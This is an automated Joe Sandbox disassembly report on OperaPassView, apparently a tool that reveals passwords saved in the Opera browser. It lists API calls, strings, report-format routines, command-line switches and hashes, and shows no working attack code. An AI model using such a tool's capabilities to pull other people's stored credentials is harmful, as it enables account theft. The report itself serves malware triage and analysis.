                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintf$memset$wcscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 2000436516-3842416460
                                        • Opcode ID: 8d6898fab53ab0b60a390204c1e4cfbcaa00540991fd3ca177e4b9a86d2d2e9f
                                        • Instruction ID: ebae007158f5f2506bfea522e64c2bfb5fbc658421ecf67e2e85ebbb39a1aa2a
                                        • Opcode Fuzzy Hash: 8d6898fab53ab0b60a390204c1e4cfbcaa00540991fd3ca177e4b9a86d2d2e9f
                                        • Instruction Fuzzy Hash: 704142B194021DAAEB20EF55CC45FAB737CFF45304F4404B6B508B2191E7759B548BAA
                                        APIs
                                        • memset.MSVCRT ref: 00405454
                                        • memset.MSVCRT ref: 00405470
                                          • Part of subcall function 00403CE2: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040556D,00000000,00405420,?,00000000,00000208), ref: 00403CED
                                          • Part of subcall function 0040B046: ??2@YAPAXI@Z.MSVCRT(?,?,004054A2,?,00000000), ref: 0040B077
                                          • Part of subcall function 0040B046: 74D41560.VERSION(00000000,0040D9A8,004054A2,?,004054A2,00000000,?,00000000,?,004054A2,?,00000000), ref: 0040B09A
                                          • Part of subcall function 0040B046: 74D41560.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040D9A8,004054A2,?,004054A2,00000000,?,00000000,?,004054A2,?,00000000), ref: 0040B0D7
                                          • Part of subcall function 0040B046: _snwprintf.MSVCRT ref: 0040B0F7
                                          • Part of subcall function 0040B046: wcscpy.MSVCRT ref: 0040B121
                                        • wcscpy.MSVCRT ref: 004054B4
                                        • wcscpy.MSVCRT ref: 004054C3
                                        • wcscpy.MSVCRT ref: 004054D3
                                        • EnumResourceNamesW.KERNEL32(?,00000004,Function_00005202,00000000), ref: 00405538
                                        • EnumResourceNamesW.KERNEL32(?,00000005,Function_00005202,00000000), ref: 00405542
                                        • wcscpy.MSVCRT ref: 0040554A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$D41560EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                        • String ID: RTL$Sb$TranslatorName$TranslatorURL$Version$general$strings$xA
                                        • API String ID: 4042976179-1320911777
                                        • Opcode ID: 0531f16f82f1763b03830d38b030f4b2bf235af16fc3c7ed929699e22dae36c4
                                        • Instruction ID: e640bb0d8affe5582c49cc3bbba19e5fe6b4909aa133fff550c0bb54b2d59f1c
                                        • Opcode Fuzzy Hash: 0531f16f82f1763b03830d38b030f4b2bf235af16fc3c7ed929699e22dae36c4
                                        • Instruction Fuzzy Hash: 0321B8B2D402187AD710B7A69C46ECB3A6CDF44758F500477B608720C2DBB95AC48AED
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 00408867
                                        • SetTextColor.GDI32(?,00FF0000), ref: 00408875
                                        • SelectObject.GDI32(?,?), ref: 0040888A
                                        • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 004088BE
                                        • SelectObject.GDI32(00000014,00000005), ref: 004088CA
                                          • Part of subcall function 00408672: GetCursorPos.USER32(?), ref: 0040867F
                                          • Part of subcall function 00408672: GetSubMenu.USER32(?,00000000), ref: 0040868D
                                          • Part of subcall function 00408672: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 004086BB
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004088E5
                                        • LoadCursorW.USER32(00000000,00000067), ref: 004088EE
                                        • SetCursor.USER32(00000000), ref: 004088F5
                                        • PostMessageW.USER32(?,0000041C,00000000,00000000), ref: 0040891B
                                        • memset.MSVCRT ref: 00408958
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00408970
                                        • DragFinish.SHELL32(?), ref: 00408979
                                        • wcscpy.MSVCRT ref: 00408990
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Cursor$DragMenuObjectSelectText$ColorDrawFileFinishHandleLoadMessageModeModulePopupPostQueryTrackmemsetwcscpy
                                        • String ID: OperaPassView
                                        • API String ID: 1499467073-491582363
                                        • Opcode ID: e68aea664200f148d7cecb962a3098de5e09b77a34bd06c91c8b8d0c291bf007
                                        • Instruction ID: f4f63289b9d4773893809d9c1953786a0c93cdb49016a9501b264df7b69ccf3c
                                        • Opcode Fuzzy Hash: e68aea664200f148d7cecb962a3098de5e09b77a34bd06c91c8b8d0c291bf007
                                        • Instruction Fuzzy Hash: 4F519071600105EBDB14AF64CE89BAA77A5EF08350F10413BF545F66E1CB39AD11CF9A
                                        APIs
                                        • LoadLibraryW.KERNEL32(psapi.dll,?,004099CA), ref: 00409BFA
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00409C13
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00409C24
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00409C35
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00409C46
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00409C57
                                        • FreeLibrary.KERNEL32(00000000), ref: 00409C77
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll$t=h,@
                                        • API String ID: 2449869053-4046855281
                                        • Opcode ID: 31203c45b7668d9f2b8208e3f14b98e8e66298e6c3a09ffeb7be2b34e8d86659
                                        • Instruction ID: 2def95ee6364c46c4c3825ab0ca41f00cd5cc6740c1be7f79dca8be930f9057a
                                        • Opcode Fuzzy Hash: 31203c45b7668d9f2b8208e3f14b98e8e66298e6c3a09ffeb7be2b34e8d86659
                                        • Instruction Fuzzy Hash: FF01D830944205EEE7106B355F88FB73DE85B45B40B14403BEA85F22D5D7BC8842CABD
                                        APIs
                                        • memset.MSVCRT ref: 004071FB
                                        • memset.MSVCRT ref: 00407210
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407222
                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00407240
                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040727D
                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 004072B4
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004072CF
                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 004072E1
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004072EC
                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 004072FE
                                        • GetSysColor.USER32(0000000F), ref: 00407317
                                        • DeleteObject.GDI32(?), ref: 0040734E
                                        • DeleteObject.GDI32(?), ref: 00407354
                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00407371
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                        • String ID:
                                        • API String ID: 1010922700-0
                                        • Opcode ID: 4ae07d1eafb86ce8459b57e9f0386dc622c1cc60e412148285927fde4e3d20a8
                                        • Instruction ID: d0bb83a61ff01b1649836e0889e79c9a4213dc8e121548c6b09103e2141b6283
                                        • Opcode Fuzzy Hash: 4ae07d1eafb86ce8459b57e9f0386dc622c1cc60e412148285927fde4e3d20a8
                                        • Instruction Fuzzy Hash: 5E419571640304FFEB30AFA0CD8AF9777ADEB48B44F000929B799A51D1C6B66840DB69
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 2081463915-1959339147
                                        • Opcode ID: f126aac336027aade2bd992aa42c9a507d327af415dc3da46cb14e8707671f64
                                        • Instruction ID: 6a8d15b326756f270775eb0b4bc9ccd913514609a237ec2c8d7395a501cc2608
                                        • Opcode Fuzzy Hash: f126aac336027aade2bd992aa42c9a507d327af415dc3da46cb14e8707671f64
                                        • Instruction Fuzzy Hash: 1001007229971968F82821A72E07F830649CB91776F30187FF650F41C1FFED500090AD
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,004099D1), ref: 00409B72
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409B8B
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409B9C
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409BAD
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409BBE
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00409BCF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                        • API String ID: 667068680-3953557276
                                        • Opcode ID: d30f8cba2966ae3013e33a565664738dbb0437bd6f4c5981b50ab5659ddf17c1
                                        • Instruction ID: d5699f626ae312526b32aedc70a84687c167ea3aa57a85226076c8fac5791ee2
                                        • Opcode Fuzzy Hash: d30f8cba2966ae3013e33a565664738dbb0437bd6f4c5981b50ab5659ddf17c1
                                        • Instruction Fuzzy Hash: E3F06D70944316EAC7119B267D41F673AFD7644B94B14443BA904F62E4DBBCA8428A6C
                                        APIs
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        • memset.MSVCRT ref: 00402003
                                        • memset.MSVCRT ref: 00402018
                                        • memset.MSVCRT ref: 0040202D
                                        • _snwprintf.MSVCRT ref: 00402055
                                        • wcscpy.MSVCRT ref: 00402071
                                        • _snwprintf.MSVCRT ref: 004020B4
                                        Strings
                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00401FDD
                                        • OperaPassView, xrefs: 00402099
                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004020A7
                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00402048
                                        • <table dir="rtl"><tr><td>, xrefs: 0040206B
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf$FileWritewcscpywcslen
                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$OperaPassView
                                        • API String ID: 2731979376-2480273121
                                        • Opcode ID: 646dcd1b9e953231d9470da4bd5ea41191e2abfd72350d1d553057ad103d5c36
                                        • Instruction ID: 28fa50906486a289e45a5ad7195f249920ae2561e4a16ea69265e6305823cba7
                                        • Opcode Fuzzy Hash: 646dcd1b9e953231d9470da4bd5ea41191e2abfd72350d1d553057ad103d5c36
                                        • Instruction Fuzzy Hash: 712199B290021C7ADB21AB55CC45EDA37BCEB48395F00447BF508B21D1D7799A84CBAD
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf
                                        • String ID: %%0.%df
                                        • API String ID: 3473751417-763548558
                                        • Opcode ID: 409ba99a9c349413dd446bed548785d2e9acc1bad2a7b6cef97f0aa39dd2e5d3
                                        • Instruction ID: ef544523c3523588dc28845724cc64a82ff7bc47be5f9679bfabf1e8d80f0346
                                        • Opcode Fuzzy Hash: 409ba99a9c349413dd446bed548785d2e9acc1bad2a7b6cef97f0aa39dd2e5d3
                                        • Instruction Fuzzy Hash: BB314171800129ABDB20EF55CC85FEB7B7CEF49344F0404FAB509B2152D7359A54CBA9
                                        APIs
                                        • wcschr.MSVCRT ref: 00409C98
                                        • wcscpy.MSVCRT ref: 00409CA8
                                          • Part of subcall function 00403A94: wcslen.MSVCRT ref: 00403AA3
                                          • Part of subcall function 00403A94: wcslen.MSVCRT ref: 00403AAD
                                          • Part of subcall function 00403A94: _memicmp.MSVCRT ref: 00403AC8
                                        • wcscpy.MSVCRT ref: 00409CF7
                                        • wcscat.MSVCRT ref: 00409D02
                                        • memset.MSVCRT ref: 00409CDE
                                          • Part of subcall function 00403E91: GetWindowsDirectoryW.KERNEL32(004111C8,00000104,?,00409D37,?,?,00000000,00000208,00000000), ref: 00403EA7
                                          • Part of subcall function 00403E91: wcscpy.MSVCRT ref: 00403EB7
                                        • memset.MSVCRT ref: 00409D26
                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,00000000), ref: 00409D41
                                        • wcscat.MSVCRT ref: 00409D4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                        • String ID: \systemroot
                                        • API String ID: 4173585201-1821301763
                                        • Opcode ID: facde2b8f89db745d60bf330219db30c754c20a28cf1d712b41ee9f834ebd63e
                                        • Instruction ID: d16e859cce06c1c2d3dd9f39888d71990bc3494b1314dad374068df8eab53baa
                                        • Opcode Fuzzy Hash: facde2b8f89db745d60bf330219db30c754c20a28cf1d712b41ee9f834ebd63e
                                        • Instruction Fuzzy Hash: 6B21D7A290530869D620E7B28C8AEAB63ECDF04714F20457FF155B20C3FB7D9944879E
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                        • String ID: 0$6
                                        • API String ID: 4066108131-3849865405
                                        • Opcode ID: da43833e401972e40bb050ca289079bb69a928caf2944b2870b10eb0a741d1a9
                                        • Instruction ID: ac8843e93e4834736a0d64f13e10506abd6307da66712888bb72bde914a3a568
                                        • Opcode Fuzzy Hash: da43833e401972e40bb050ca289079bb69a928caf2944b2870b10eb0a741d1a9
                                        • Instruction Fuzzy Hash: CD318FB2408345AFDB209F91D845A9BB7E8FFC4314F01493EFA48A2291D375D945CF9A
                                        APIs
                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004022D6
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004022E8
                                        • FreeLibrary.KERNEL32(00000000), ref: 004022FC
                                        • 6F551CD0.COMCTL32 ref: 0040230A
                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00402327
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Library$AddressF551FreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 269827459-317687271
                                        • Opcode ID: 5e0be6fcd069c0de86451f3d07a72106bd430ef0109bf354b51bb24d89ff4816
                                        • Instruction ID: a8424b05ea2414d579705bc050e2bdef412539755436e16bd16116d1aed5ed42
                                        • Opcode Fuzzy Hash: 5e0be6fcd069c0de86451f3d07a72106bd430ef0109bf354b51bb24d89ff4816
                                        • Instruction Fuzzy Hash: A801D671710211EAD7115BF49DCDB6F7A9CEB84749B10023AE902F21C0DBBCC9019668
                                        APIs
                                          • Part of subcall function 00403CB3: GetFileAttributesW.KERNELBASE(?,00405371,?,00405428,00000000,?,00000000,00000208), ref: 00403CB7
                                        • wcscpy.MSVCRT ref: 00405382
                                        • wcscpy.MSVCRT ref: 00405392
                                        • GetPrivateProfileIntW.KERNEL32(00410D78,rtl,00000000,00410B68), ref: 004053A3
                                          • Part of subcall function 00404F08: GetPrivateProfileStringW.KERNEL32(00410D78,?,0040C3F0,00410E08,?,00410B68), ref: 00404F24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl$xA
                                        • API String ID: 3176057301-3088672139
                                        • Opcode ID: bbf035c638bcee87d24ac4c102a85c0043e067a756daed89e911eff3e230b98a
                                        • Instruction ID: 8d6e5ffcfa0c930258885b20e10a4471abb56068015b67b023cc0f5f92e7e1d5
                                        • Opcode Fuzzy Hash: bbf035c638bcee87d24ac4c102a85c0043e067a756daed89e911eff3e230b98a
                                        • Instruction Fuzzy Hash: 7FF0F072FC831132D62036B65C03F6E2908CBD2B25F55853BBA04B61C6C7FD4885879D
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: free$wcslen
                                        • String ID:
                                        • API String ID: 3592753638-3916222277
                                        • Opcode ID: 7e7a27ca5187d256414d2101c6a5a9f5acec834a3b123171e393923e73fb705c
                                        • Instruction ID: ea8e8bfc3689916eaf51f58325e240114e1aa07e795bf1a39d57aab077eb8cb1
                                        • Opcode Fuzzy Hash: 7e7a27ca5187d256414d2101c6a5a9f5acec834a3b123171e393923e73fb705c
                                        • Instruction Fuzzy Hash: 0C615A30C0520ADADF189FA5E4844EEB7B1FF04316F60847FE452B62A4EB396981CB59
                                        APIs
                                        • memset.MSVCRT ref: 004043E4
                                        • _snwprintf.MSVCRT ref: 00404417
                                        • wcslen.MSVCRT ref: 00404423
                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),0040D934,?,?,?,00000000), ref: 0040443B
                                        • wcslen.MSVCRT ref: 00404449
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),0040D934,?,?,?,00000000), ref: 0040445C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$_snwprintfmemset
                                        • String ID: %s (%s)$m1@
                                        • API String ID: 3979103747-711742907
                                        • Opcode ID: 8131d3bc0ca6c2f79b51d761541b27c86472350e0654d01bf05fa02329cd5419
                                        • Instruction ID: bb86e644d6e989a92f7ca735dca76e8dba8552fc6dee4fa7a9c70cf9b9ee5f46
                                        • Opcode Fuzzy Hash: 8131d3bc0ca6c2f79b51d761541b27c86472350e0654d01bf05fa02329cd5419
                                        • Instruction Fuzzy Hash: 8E21A1B2800119BBCF21DF95CC45D8AB3B8FF44348F008476EA48AB142DB35EA098BD8
                                        APIs
                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002), ref: 00403900
                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 0040391E
                                        • wcslen.MSVCRT ref: 0040392B
                                        • wcscpy.MSVCRT ref: 0040393B
                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00403945
                                        • wcscpy.MSVCRT ref: 00403955
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
